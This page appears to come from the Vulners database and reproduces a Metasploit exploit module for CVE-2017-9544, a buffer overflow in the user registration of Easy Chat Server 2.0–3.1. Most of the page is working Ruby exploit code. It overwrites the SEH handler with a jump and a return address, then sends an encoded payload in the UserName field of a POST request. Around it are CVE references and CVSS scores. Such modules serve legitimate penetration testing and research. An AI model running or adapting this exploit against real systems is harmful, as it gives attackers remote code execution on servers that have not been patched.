Lucene search
+L

Easy Chat Server User Registeration Buffer Overflow (SEH)

🗓️ 09 Oct 2017 00:00:00Reported by Marco Rivoli, Aitezaz MohsinType 
metasploit
 metasploit
🔗 www.rapid7.com👁 18 Views

Easy Chat Server User Registeration Buffer Overflow (SEH) exploit module for Metasploi

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2017-9544
29 May 201815:50
circl
cnvd
CNVD
EFS Software Easy Chat Server Heap Buffer Overflow Vulnerability
15 Jun 201700:00
cnvd
cve
CVE
CVE-2017-9544
12 Jun 201706:00
cve
cvelist
Cvelist
CVE-2017-9544
12 Jun 201706:00
cvelist
nvd
NVD
CVE-2017-9544
12 Jun 201706:29
nvd
osv
OSV
CVE-2017-9544
12 Jun 201706:29
osv
prion
Prion
Stack overflow
12 Jun 201706:29
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',
        'Description' => %q{
          This module exploits a buffer overflow during user registration in Easy Chat Server software.
        },
        'Author' => [
          'Marco Rivoli', # Metasploit
          'Aitezaz Mohsin' # POC
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2017-9544' ],
          [ 'EDB', '42155' ],
        ],
        'Privileged' => true,
        'Payload' => {
          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],
        ],
        'DefaultOptions' => {
          'RPORT' => 80,
          'EXITFUNC' => 'thread',
          'ENCODER' => 'x86/alpha_mixed'
        },
        'DisclosureDate' => '2017-10-09',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def exploit
    sploit = rand_text_alpha_upper(217)
    sploit << "\xeb\x06\x90\x90"
    sploit << [target.ret].pack('V')
    sploit << payload.encoded
    sploit << rand_text_alpha_upper(200)

    res = send_request_cgi({
      'uri' => normalize_uri(URI, 'registresult.htm'),
      'method' => 'POST',
      'vars_post' => {
        'UserName' => sploit,
        'Password' => 'test',
        'Password1' => 'test',
        'Sex' => 1,
        'Email' => 'x@',
        'Icon' => 'x.gif',
        'Resume' => 'xxxx',
        'cw' => 1,
        'RoomID' => 4,
        'RepUserName' => 'admin',
        'submit1' => 'Register'
      }
    })
    handler
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Oct 2017 00:00Current
8.9High risk
Vulners AI Score8.9
CVSS 27.5
CVSS 3.19.8
EPSS0.24118
18